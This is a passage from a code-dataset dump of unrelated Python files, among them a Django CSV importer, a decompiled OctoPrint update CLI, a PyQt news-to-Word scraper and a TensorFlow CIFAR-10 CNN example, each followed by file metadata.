full_name='object_detection.protos.Matcher.matcher_oneof',\n index=0,\n containing_type=None,\n fields=[])],\n serialized_start=162,\n serialized_end=326)\n_MATCHER.fields_by_name['argmax_matcher'].message_type = object__detection_dot_protos_dot_argmax__matcher__pb2._ARGMAXMATCHER\n_MATCHER.fields_by_name['bipartite_matcher'].message_type = object__detection_dot_protos_dot_bipartite__matcher__pb2._BIPARTITEMATCHER\n_MATCHER.oneofs_by_name['matcher_oneof'].fields.append(_MATCHER.fields_by_name['argmax_matcher'])\n_MATCHER.fields_by_name['argmax_matcher'].containing_oneof = _MATCHER.oneofs_by_name['matcher_oneof']\n_MATCHER.oneofs_by_name['matcher_oneof'].fields.append(_MATCHER.fields_by_name['bipartite_matcher'])\n_MATCHER.fields_by_name['bipartite_matcher'].containing_oneof = _MATCHER.oneofs_by_name['matcher_oneof']\nDESCRIPTOR.message_types_by_name['Matcher'] = _MATCHER\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\nMatcher = _reflection.GeneratedProtocolMessageType('Matcher', (_message.Message,), {'DESCRIPTOR':_MATCHER, \n '__module__':'object_detection.protos.matcher_pb2'})\n_sym_db.RegisterMessage(Matcher)","sub_path":"pycfiles/todl-0.1.1.tar/matcher_pb2.cpython-37.py","file_name":"matcher_pb2.cpython-37.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223482006","text":"from datetime import datetime, timedelta\nfrom os.path import exists, basename\nimport csv\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import 
transaction\n\nfrom consumption.models import User, UserConsumption\n\nDELIMITER = ','\nDATA_PATH = '{}/consumption/{}.csv'\nDATETIME_FORMAT = '%Y-%m-%d %H:%M:%S'\nCONSUMPTION_INTERVAL = 30 # minutes\n\n\nclass Command(BaseCommand):\n help = 'import users and user consumption data'\n\n def add_arguments(self, parser):\n \"\"\"adds needed command arguments\"\"\"\n parser.add_argument(\n '-d',\n '--delimiter',\n default=DELIMITER,\n type=str,\n help='delimiting character',\n )\n parser.add_argument(\n '-i',\n '--interval',\n default=CONSUMPTION_INTERVAL,\n type=int,\n help='interval',\n )\n parser.add_argument(\n '-f',\n '--format',\n default=DATETIME_FORMAT,\n type=str,\n help='datetime format',\n )\n parser.add_argument(\n '-s',\n '--silent',\n default=False,\n action='store_true',\n help='do not display messages',\n )\n parser.add_argument('filepath', type=str)\n\n def handle(self, *args, **options):\n \"\"\"command logic: loads data into database\"\"\"\n\n self.file_path = file_path = options['filepath']\n self.delimiter = options['delimiter']\n self.interval = options['interval']\n self.format = options['format']\n self.silent = options['silent']\n\n if not exists(file_path):\n raise Exception('file \"{}\" not found'.format(file_path))\n # get consumption directory path\n self.base_path = file_path[:-(len(basename(file_path)))]\n self.add_users()\n\n def add_users(self):\n \"\"\"add users and their respective consumption data from CSV files\"\"\"\n\n with open(self.file_path, 'r') as users_file:\n reader = csv.reader(users_file, delimiter=self.delimiter)\n count = 0\n # skip the header row\n next(reader)\n with transaction.atomic():\n for row in reader:\n pk, area, tariff = row\n user_id = int(pk)\n # create the user if not exists\n _, created = User.objects.get_or_create(\n id=user_id,\n defaults=dict(area_code=area, tariff_code=tariff),\n )\n # increment user count for created users\n if created:\n count += 1\n # add user consumption data if file exists\n user_file_path = DATA_PATH.format(self.base_path, pk)\n if not exists(user_file_path):\n continue\n self.add_user_consumption(user_id, user_file_path)\n if not self.silent:\n self.stdout.write(\n f'Added {count} users and their respective consumption data')\n\n def add_user_consumption(self, user_id, user_file_path):\n \"\"\"bulk insert user consumption data from CSV file\"\"\"\n\n with open(user_file_path, 'r') as consumption_file:\n sub_reader = csv.reader(consumption_file, delimiter=self.delimiter)\n # skip the header row\n next(sub_reader)\n instances = []\n for row2 in sub_reader:\n end = datetime.strptime(row2[0], self.format)\n start = end - timedelta(minutes=self.interval)\n consumption = float(row2[1])\n instances.append(\n UserConsumption(\n user_id=user_id,\n start=start,\n end=end,\n consumption=consumption,\n ))\n UserConsumption.objects.bulk_create(instances)\n","sub_path":"dashboard/consumption/management/commands/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"278140390","text":"from lib.PIL import Image\r\nimport random\r\nimport Locator\r\nfrom lib.noise.noise import pnoise2 as perlin\r\npixelColour = [[0,0,0],[255,0,0],[0,255,0],[0,0,255]]\r\nsize = 2048\r\noctaves = 6\r\npersistence = 0.05\r\nlacunarity = 2.0\r\ndef drawImage():\r\n    testImage = Image.new(\"RGB\", (size,size), (255,255,255))\r\n    pixel = testImage.load()\r\n    for x in range(size):\r\n        for y in range(size):\r\n            freq 
= 64*octaves\r\n            gen= perlin(x / freq, y / freq, octaves,persistence,lacunarity,size,size,0)\r\n            if gen <-0.4:\r\n                RGB = pixelColour[3]\r\n            elif gen >0.4:\r\n                RGB = pixelColour[2]\r\n            elif -0.005< gen <0.00005:\r\n                RGB = pixelColour[1]\r\n            else:\r\n                RGB = pixelColour[0]\r\n            pixel[x,y]=(RGB[0],RGB[1],RGB[2])\r\n    return testImage\r\ndef main():\r\n    finalImage = drawImage()\r\n    finalImage.save(Locator.main(\"res\\\\textures\\\\world\\\\worldMap.png\"))\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"Evolution/src/python/Mapper.py","file_name":"Mapper.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298533957","text":"#!/usr/bin/python2.7 -tt\n\nimport sys, argparse, h5py\nimport numpy as np, pandas as pd\nfrom chip_db import chip_data\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('cell_type', help='name of cell type')\n\tparser.add_argument('interaction', help='name of interaction file')\n\tparser.add_argument('database', help='name of database file')\n\tparser.add_argument('--out_dir', help='directory to which to write files', default='.')\n\targs = parser.parse_args()\n\t#\n\tinteractions = pd.read_table(args.interaction, usecols=range(6), \n\t\tnames=['chrA', 'startA','endA','chrB','startB','endB'])\n\n\tif not interactions['chrA'].astype(str).str.startswith('chr').all():\n\t\tinteractions['chrA'] = 'chr' + interactions['chrA'].astype(str)\n\t\tinteractions['chrB'] = 'chr' + interactions['chrB'].astype(str)\n\tnum_interactions = len(interactions)\n\t# find longest interaction interval in df\n\tinteraction_length = 25000\n\tinput_length = interaction_length / 100\n\t#\n\thdfile = h5py.File(args.database, 'r')\n\tgrp = hdfile['/'+args.cell_type+'/50']\n\tdset = grp[u'chip_tracks']\n\t# Set up instance of database object\n\tcurr_db = chip_data(hdfile, grp, dset, args.cell_type, 'all')\n\t# Set length of input and number of training samples\n\t#\n\t# Pull out all relevant regions from the database and save for reuse\n\tdata_array_ll = []\n\tdata_array_lr = []\n\tdata_array_rl = []\n\tdata_array_rr = []\n\tfor idx, row in interactions.iterrows():\n\t\tif row[2] - row[1] == 5000:\n\t\t\tdata_array_ll.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1] - 20000, \n\t\t\t\t\tend_pos=row[2], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4] - 20000, \n\t\t\t\t\tend_pos=row[5], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t\tdata_array_lr.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1] - 20000, \n\t\t\t\t\tend_pos=row[2], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4], \n\t\t\t\t\tend_pos=row[5] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t\tdata_array_rl.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1], \n\t\t\t\t\tend_pos=row[2] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4] - 20000, \n\t\t\t\t\tend_pos=row[5], \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t\tdata_array_rr.append(\n\t\t\t\t[curr_db.get_data(\n\t\t\t\t\tchromosome=row[0], \n\t\t\t\t\tstart_pos=row[1], \n\t\t\t\t\tend_pos=row[2] + 20000, \n\t\t\t\t\tres=100, 
\n\t\t\t\t\ttransform='log_z'), \n\t\t\t\tcurr_db.get_data(\n\t\t\t\t\tchromosome=row[3], \n\t\t\t\t\tstart_pos=row[4], \n\t\t\t\t\tend_pos=row[5] + 20000, \n\t\t\t\t\tres=100, \n\t\t\t\t\ttransform='log_z')])\n\t\t# Print progress\n\t\tsys.stdout.write(\"\\r{:5.1f}\".format(float(idx) / num_interactions * 100) + \"% complete\")\n\tsys.stdout.write('\\r100.0% complete!\\n')\n\t#\n\tfor name, data_array in zip(['ll', 'lr', 'rl', 'rr'], [data_array_ll, data_array_lr, data_array_rl, data_array_rr]):\n\t\twith open(args.cell_type+':all:log_z:'+str(100)+'bp:'+name+'.npy', 'wb') as outfile:\n\t\t\tnp.save(outfile, np.array(data_array))\n\nif __name__ == '__main__':\n\tmain()","sub_path":"extend_unevenly.py","file_name":"extend_unevenly.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"546624883","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: C:\\Devel\\OctoPrint\\OctoPrint\\src\\octoprint\\plugins\\softwareupdate\\cli.py\n# Compiled at: 2020-02-26 04:08:42\n# Size of source mod 2**32: 7534 bytes\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'\n__copyright__ = 'Copyright (C) 2015 The OctoPrint Project - Released under terms of the AGPLv3 License'\n\ndef commands(cli_group, pass_octoprint_ctx, *args, **kwargs):\n import click\n click.disable_unicode_literals_warning = True\n import sys, requests.exceptions\n from octoprint.cli.client import create_client, client_options\n\n @click.command('check')\n @click.option('--force', is_flag=True, help='Ignore the cache for the update check')\n @click.option('--only-new', is_flag=True, help='Only show entries with updates available')\n @client_options\n @click.argument('targets', nargs=-1)\n def check_command(force, only_new, apikey, host, port, httpuser, httppass, https, prefix, targets):\n params = dict(force=force)\n if targets:\n params['check'] = ','.join(targets)\n client = create_client(settings=(cli_group.settings), apikey=apikey,\n host=host,\n port=port,\n httpuser=httpuser,\n httppass=httppass,\n https=https,\n prefix=prefix)\n r = client.get('plugin/softwareupdate/check', params=params)\n try:\n r.raise_for_status()\n except requests.exceptions.HTTPError as e:\n click.echo('Could not get update information from server, got {}'.format(e))\n sys.exit(1)\n\n data = r.json()\n status = data['status']\n information = data['information']\n lines = []\n octoprint_line = None\n for key, info in information.items():\n status_text = 'Up to date'\n if info['updateAvailable']:\n if info['updatePossible']:\n status_text = 'Update available'\n else:\n status_text = 'Update available (manual)'\n elif only_new:\n continue\n line = '{} (target: {})\\n\\tInstalled: {}\\n\\tAvailable: {}\\n\\t=> {}'.format(info['displayName'], key, info['information']['local']['name'], info['information']['remote']['name'], status_text)\n if key == 'octoprint':\n octoprint_line = line\n else:\n lines.append(line)\n\n lines.sort()\n if octoprint_line:\n lines = [octoprint_line] + lines\n for line in lines:\n click.echo(line)\n\n click.echo()\n if status == 'current':\n click.echo('Everything is up to date')\n else:\n click.echo('There are updates available!')\n\n @click.command('update')\n 
@click.option('--force', is_flag=True, help='Update even if already up to date')\n @client_options\n @click.argument('targets', nargs=-1)\n def update_command(force, apikey, host, port, httpuser, httppass, https, prefix, targets):\n data = dict(force=force)\n if targets:\n data['check'] = targets\n client = create_client(settings=(cli_group.settings), apikey=apikey,\n host=host,\n port=port,\n httpuser=httpuser,\n httppass=httppass,\n https=https,\n prefix=prefix)\n flags = dict(waiting_for_restart=False,\n seen_close=False)\n\n def on_message(ws, msg_type, msg):\n if msg_type != 'plugin' or msg['plugin'] != 'softwareupdate':\n return\n plugin_message = msg['data']\n if 'type' not in plugin_message:\n return\n plugin_message_type = plugin_message['type']\n plugin_message_data = plugin_message['data']\n if plugin_message_type == 'updating':\n click.echo('Updating {} to {}...'.format(plugin_message_data.get('name', 'unknown'), plugin_message_data.get('version', 'n/a')))\n elif plugin_message_type == 'update_failed':\n click.echo('\\t... failed :(')\n elif plugin_message_type == 'loglines' and 'loglines' in plugin_message_data:\n for entry in plugin_message_data['loglines']:\n prefix = '>>> ' if entry['stream'] == 'call' else ''\n error = entry['stream'] == 'stderr'\n click.echo(('\\t{}{}'.format(prefix, entry['line'].replace('\\n', '\\n\\t'))), err=error)\n\n elif plugin_message_type == 'success' or plugin_message_type == 'restart_manually':\n results = plugin_message_data['results'] if 'results' in plugin_message_data else dict()\n if results:\n click.echo('The update finished successfully.')\n if plugin_message_type == 'restart_manually':\n click.echo('Please restart the OctoPrint server.')\n else:\n click.echo('No update necessary')\n ws.close()\n elif plugin_message_type == 'restarting':\n flags['waiting_for_restart'] = True\n click.echo('Restarting to apply changes...')\n elif plugin_message_type == 'failure':\n click.echo('Error')\n ws.close()\n\n def on_open(ws):\n if flags['waiting_for_restart'] and flags['seen_close']:\n click.echo(' Reconnected!')\n else:\n click.echo('Connected to server...')\n\n def on_close(ws):\n if flags['waiting_for_restart'] and flags['seen_close']:\n click.echo('.', nl=False)\n else:\n flags['seen_close'] = True\n click.echo('Disconnected from server...')\n\n socket = client.create_socket(on_message=on_message, on_open=on_open,\n on_close=on_close)\n r = client.post_json('plugin/softwareupdate/update', data=data)\n try:\n r.raise_for_status()\n except requests.exceptions.HTTPError as e:\n click.echo('Could not get update information from server, got {}'.format(e))\n sys.exit(1)\n\n data = r.json()\n to_be_updated = data['order']\n checks = data['checks']\n click.echo('Update in progress, updating:')\n for name in to_be_updated:\n click.echo('\\t{}'.format(name if name not in checks else checks[name]))\n\n socket.wait()\n if flags['waiting_for_restart']:\n if socket.reconnect(timeout=60):\n click.echo('The update finished successfully.')\n else:\n click.echo(\"The update finished successfully but the server apparently didn't restart as expected.\")\n click.echo('Please restart the OctoPrint server.')\n\n return [check_command, update_command]","sub_path":"pycfiles/OctoPrint-1.4.0-py2.py3-none-any/cli.cpython-37.py","file_name":"cli.cpython-37.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} 
+{"seq_id":"36550943","text":"from context import sample\nfrom sample import longestWord\nimport unittest\n\n\nclass KnwonValues(unittest.TestCase):\n casos = ((\"Hoje Estarei Livre\", 7),\n (\"Ontem Sim\", 5))\n\n def test_answer(self):\n '''longestWord should return the kwon values with known inputs '''\n for frase, tam in self.casos:\n resultado = longestWord.longestWord(frase)\n self.assertEqual(resultado, tam)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"pythonCodes/testes/test_longestWord.py","file_name":"test_longestWord.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"641844733","text":"import requests\nimport re\nfrom lxml import etree\nimport time\nimport datetime\nimport sys\nimport docx\nfrom docx.oxml.ns import qn\nfrom docx.shared import Cm, Pt\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\n\nfrom PyQt5 import QtWidgets\nfrom PyQt5.QtGui import QIcon, QFont\nfrom PyQt5.QtCore import QThread, pyqtSignal\nimport os\n\nfrom main_windows import Ui_MainWindow\nfrom statement import Statement\n\n\nclass DownWord(QThread):\n str_out = pyqtSignal(str) # 打印窗口信号\n status_out = pyqtSignal(str) # 修改状态文字信号\n clear_out = pyqtSignal() # 清屏\n over_out = pyqtSignal() # 完成\n\n def __init__(self, bace_url,start_page):\n super().__init__()\n self.bace_url = bace_url\n self.start_page = start_page\n self.type_flag = False # True 是城市资讯(使用&P=2) 其他使用 Index_2.html\n self.headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',\n }\n self.stop_flag = False\n self.all_num = 0\n\n def get_url(self):\n if self.stop_flag:\n self.str_out.emit('停止成功')\n self.status_out.emit('stop')\n return\n if 'ColId' in self.bace_url:\n self.type_flag = True\n else:\n self.type_flag = False\n page = self.start_page\n while True:\n if page % 5 == 0:\n self.clear_out.emit()\n if self.stop_flag:\n self.str_out.emit('停止成功')\n self.status_out.emit('stop')\n return\n if self.type_flag == False:\n if page == 1:\n now_url = self.bace_url\n else:\n now_url = self.bace_url.replace('.html', '_{}.html')\n else:\n now_url = self.bace_url + '&P={}'\n next_url = now_url.format(str(page))\n print(next_url)\n selector = ''\n for i in range(5):\n try:\n mes = requests.get(next_url, timeout=5, headers=self.headers).content.decode('utf-8')\n selector = etree.HTML(mes)\n break\n except Exception as e:\n print(e)\n if i == 4:\n err_mes = '访问基础页面出错:' + str(e)\n self.write_err_txt(err_mes)\n self.ui.textEdit.append(\"出错,已记录\")\n print('失败')\n return\n time.sleep(1)\n all_url = selector.xpath('//*[@id=\"contentList\"]/li[@class=\"common\"]/span/a')\n if all_url:\n print('第{}页'.format(str(page)))\n self.str_out.emit('抓取第{}页中。。。'.format(str(page)))\n for j, one_url in enumerate(all_url):\n self.all_num += 1\n print(self.all_num)\n if (j + 1) % 10 == 0:\n self.str_out.emit('完成{}篇'.format(str(j + 1)))\n if self.stop_flag:\n self.str_out.emit('停止成功')\n self.status_out.emit('stop')\n return\n try:\n url = 'http://www.chinacity.org.cn' + one_url.xpath('./@href')[0]\n except:\n continue\n title = one_url.xpath('./text()')\n title = title[0] if title else ''\n over_title = re.sub(r'[\\\\/?*\"<>:|]', '', title)\n self.download_word(over_title, url)\n self.str_out.emit('完成')\n page += 1\n else:\n self.str_out.emit('全部完成!'.format(str(page)))\n self.over_out.emit()\n break\n\n def download_word(self, title, one_url):\n # print(one_url)\n body_selector = ''\n 
for i in range(5):\n try:\n res = requests.get(one_url, timeout=5, headers=self.headers)\n status = str(res.status_code)\n if status == '404':\n mes = '链接:'+ one_url + '失效'\n self.write_err_txt(mes)\n return\n mes = res.content.decode('utf-8')\n body_selector = etree.HTML(mes)\n print('成功')\n break\n except Exception as e:\n print('访问文章链接出错', e)\n if i == 4:\n err_mes = '访问文章链接出错:'+str(e)\n self.write_err_txt(err_mes)\n self.str_out.emit(\"出错,已记录\")\n print('失败')\n return\n time.sleep(1)\n time.sleep(0.2)\n body_text = body_selector.xpath('//div[@class=\"artleft\"]/div[2]/p/text()')\n body_list = []\n if self.stop_flag:\n return\n for one_d in body_text:\n paragraph = one_d.strip()\n body_list.append(paragraph)\n if self.stop_flag:\n return\n self.save_word(body_list, title)\n\n def write_err_txt(self, mes):\n \"\"\"append a line to the error log\"\"\"\n now_err_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n with open('./system_files/错误日志.txt', 'a', encoding='utf-8') as file:\n file.write(now_err_time + ' ------- ')\n file.write(str(mes) + '\\n')\n\n def save_word(self, text_list, name):\n '''\n write the article out as a Word document\n :param text_list: list holding the body text, one paragraph per element\n :param name: file name to save under\n :return:\n '''\n # doc = docx.Document()\n doc = docx.Document(docx=os.path.join(os.getcwd(), './system_files/default.docx'))\n # add a new style (first argument is the style name; second is the style type: 1 = paragraph, 2 = character, 3 = table)\n # write the title\n paragraph = doc.add_paragraph()\n r = paragraph.add_run(name)\n r.font.size = Pt(22)\n r.font.name = '黑体'\n r._element.rPr.rFonts.set(qn('w:eastAsia'), '黑体')\n paragraph.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\n # set up a blank body style\n style = doc.styles['Normal']\n # set the Latin font\n style.font.name = 'Times New Roman'\n # set the font size\n style.font.size = Pt(16)\n # set the East Asian font\n style.element.rPr.rFonts.set(qn('w:eastAsia'), '仿宋_GB2312')\n # get the paragraph format\n paragraph_format = style.paragraph_format\n # first-line indent\n paragraph_format.first_line_indent = Cm(1.12)\n # paragraph line spacing of 1.5 lines\n paragraph_format.line_spacing = 1.50\n for one in text_list:\n doc.add_paragraph(str(one), style='Normal') # insert one paragraph of body text\n doc.save('./word文档/{}.docx'.format(name))\n\n def change_stop_flag(self):\n self.status_out.emit('stopping')\n self.stop_flag = True\n\n def run(self):\n try:\n self.get_url()\n except Exception as e:\n mes = '启动错误:' + str(e)\n self.write_err_txt(mes)\n print(e)\n\n\nclass VisitMain(object):\n \"\"\"main window\"\"\"\n\n def __init__(self):\n self.app = QtWidgets.QApplication(sys.argv)\n self.main_window = QtWidgets.QWidget()\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self.main_window)\n self.main_window.setWindowIcon(QIcon('./system_files/图标.png'))\n self.main_window.setFont(QFont(\"Microsoft YaHei\", 9))\n self.set_base_url()\n self.connect()\n self.ui.pushButton.setEnabled(False)\n # create the disclaimer dialog\n self.statement = Statement('news_output_word')\n if not self.statement.check_pd:\n exit()\n if self.statement.accept:\n self.main_window.show()\n else:\n self.statement.ui.pushButton.clicked.connect(self.main_window.show)\n sys.exit(self.app.exec_())\n\n def connect(self):\n self.ui.pushButton.clicked.connect(self.stop_flag) # stop\n self.ui.pushButton_2.clicked.connect(self.start_spider) # start\n\n def start_spider(self):\n \"\"\"start the crawler\"\"\"\n self.clear()\n word_url = self.ui.lineEdit.text()\n if not word_url:\n self.ui.textEdit.append(\"请导入链接!\")\n return\n\n start_page = self.ui.lineEdit_2.text()\n if start_page:\n try:\n int(start_page)\n except:\n self.ui.textEdit.append(\"请填写正确的页数\")\n return\n pass\n else:\n self.ui.textEdit.append(\"请填写页数\")\n return\n\n try:\n if not 
os.path.exists('./system_files'):\n os.makedirs('./system_files')\n with open(\"./system_files/last_url.txt\", 'w') as txtData:\n txtData.write(self.ui.lineEdit.text())\n except Exception as e:\n print('保存url错误:', e)\n self.change_status('begin')\n self.spider1 = DownWord(word_url,int(start_page))\n self.spider1.start()\n self.spider1.str_out.connect(self.pri_text)\n self.spider1.status_out.connect(self.change_status)\n self.spider1.clear_out.connect(self.clear)\n self.spider1.over_out.connect(self.end_spider)\n\n def end_spider(self):\n self.ui.pushButton.setEnabled(False)\n self.ui.pushButton_2.setEnabled(True)\n\n def set_base_url(self):\n self.ui.lineEdit_2.setText('1')\n try:\n with open(\"./system_files/last_url.txt\") as txtData:\n sender = txtData.readlines()[0]\n self.ui.lineEdit.setText(sender)\n except:\n self.ui.textEdit.append(\"无上次记录,请导入链接。\")\n pass\n\n def clear(self):\n self.ui.textEdit.clear()\n\n def pri_text(self, text):\n self.ui.textEdit.append(text)\n\n def change_status(self, mes):\n if mes == 'stop':\n self.ui.label_3.setText('已停止')\n self.ui.label_3.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.pushButton.setEnabled(False)\n self.ui.pushButton_2.setEnabled(True)\n elif mes == 'begin':\n self.ui.label_3.setText('运行中')\n self.ui.label_3.setStyleSheet(\"color: rgb(50, 150, 0)\")\n self.ui.pushButton_2.setEnabled(False)\n self.ui.pushButton.setEnabled(True)\n elif mes == 'stopping':\n self.ui.label_3.setText('停止中')\n self.ui.label_3.setStyleSheet(\"color: rgb(255, 0, 0);\")\n self.ui.pushButton.setEnabled(False)\n else:\n pass\n\n # color: rgb(50, 150, 0); # start\n\n def stop_flag(self):\n self.spider1.change_stop_flag()\n\n\nif __name__ == '__main__':\n VisitMain()\n # a = DownWord()\n # a.get_url()\n # url = 'http://www.chinacity.org.cn/csfz/cshj/391391.html'\n # a.download_word('1', url)\n","sub_path":"项目模块/网易云/网易云/downlword.py","file_name":"downlword.py","file_ext":"py","file_size_in_byte":11252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"66063630","text":"\"\"\" Convolutional Neural Network.\n\nBuild and train a convolutional neural network with TensorFlow.\nThis example adapts the MNIST example to the CIFAR-10 dataset\n(https://www.cs.toronto.edu/~kriz/cifar.html)\n\nThis example is using TensorFlow layers API, see 'convolutional_network_raw'\nexample for a raw implementation with variables.\n\nAuthor: Aymeric Damien\nProject: https://github.com/aymericdamien/TensorFlow-Examples/\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nimport numpy as np\nimport sys\nimport os\nfrom server.model import datasets\nimport tensorflow as tf\nimport pandas as pd\nfrom tensorflow.contrib import predictor\nfrom server import config\nimport json\n\n\n# Training Parameters\nlearning_rate = 0.001\nnum_steps = 2\nbatch_size = 128\n\n# Network Parameters\nnum_input = 32*32*3 # CIFAR-10 data input (img shape: 32*32*3)\nnum_classes = 10 # CIFAR-10 total classes\ndropout = 0.25 # Dropout, probability to drop a unit\n\n# set parameters\ndef set_parameter(dic):\n # dic = json.loads(conf)[0]\n global learning_rate, num_steps, batch_size\n learning_rate = dic['learning_rate']\n num_steps = dic['num_steps']\n batch_size = dic['batch_size']\n\n# Create the neural network\ndef conv_net(x_dict, n_classes, dropout, reuse, is_training):\n # Define a scope for reusing the variables\n with tf.variable_scope('ConvNet', reuse=reuse):\n # TF Estimator input is a dict, in case of multiple inputs\n x = 
x_dict['images']\n\n # CIFAR-10 data input is a 1-D vector of 3072 features (32*32*3)\n # Reshape to match picture format [Height x Width x Channel]\n # Tensor input becomes 4-D: [Batch Size, Height, Width, Channel]\n x = tf.reshape(x, shape=[-1, 32, 32, 3])\n\n # Convolution Layer with 32 filters and a kernel size of 5\n conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu)\n # Max Pooling (down-sampling) with strides of 2 and kernel size of 2\n conv1 = tf.layers.max_pooling2d(conv1, 2, 2)\n\n # Convolution Layer with 64 filters and a kernel size of 3\n conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu)\n # Max Pooling (down-sampling) with strides of 2 and kernel size of 2\n conv2 = tf.layers.max_pooling2d(conv2, 2, 2)\n\n # Flatten the data to a 1-D vector for the fully connected layer\n fc1 = tf.contrib.layers.flatten(conv2)\n\n # Fully connected layer (in tf contrib folder for now)\n fc1 = tf.layers.dense(fc1, 1024)\n # Apply Dropout (if is_training is False, dropout is not applied)\n fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training)\n\n # Output layer, class prediction\n out = tf.layers.dense(fc1, n_classes)\n\n return out\n\n\n# Define the model function (following TF Estimator Template)\ndef model_fn(features, labels, mode):\n # Build the neural network\n # Because Dropout has different behavior at training and prediction time, we\n # need to create 2 distinct computation graphs that still share the same weights.\n logits_train = conv_net(features, num_classes, dropout, reuse=False,\n is_training=True)\n logits_test = conv_net(features, num_classes, dropout, reuse=True,\n is_training=False)\n\n # Predictions\n pred_classes = tf.argmax(logits_test, axis=1)\n pred_probas = tf.nn.softmax(logits_test)\n\n\n # If prediction mode, early return\n if mode == tf.estimator.ModeKeys.PREDICT:\n print('PREDICT mode')\n return tf.estimator.EstimatorSpec(mode, predictions=pred_classes)\n\n # Define loss and optimizer\n loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits=logits_train, labels=tf.cast(labels, dtype=tf.int32)))\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_op = optimizer.minimize(loss_op,\n global_step=tf.train.get_global_step())\n\n # Evaluate the accuracy of the model\n acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes)\n\n # TF Estimators require returning an EstimatorSpec that specifies\n # the different ops for training, evaluating, ...\n estim_specs = tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=pred_classes,\n loss=loss_op,\n train_op=train_op,\n eval_metric_ops={'accuracy': acc_op})\n\n return estim_specs\n\ndef evaluate(model, x_test, y_test):\n # Evaluate the Model\n # Define the input function for evaluating\n input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': x_test}, y=y_test,\n batch_size=batch_size, shuffle=False)\n # Use the Estimator 'evaluate' method\n e = model.evaluate(input_fn)\n\n print(\"Evaluate Accuracy:\", e['accuracy'])\n\n return e['accuracy'], e['loss']\n\n# load the exported model with predictor.from_saved_model() and use it for prediction\ndef predict(export_dir, x_test):\n print('Predict mode')\n predict_fn = predictor.from_saved_model(export_dir)\n predictions = predict_fn( {\"images\": x_test} )\n df = pd.DataFrame(predictions)\n # df['original_labels'] = y_test\n print(df.head())\n # total = len(predictions['output'])\n # count = 0\n # for i in range(total):\n # if predictions['output'][i] == y_test[i]:\n # count += 1\n\n # accuracy = count/total\n # 
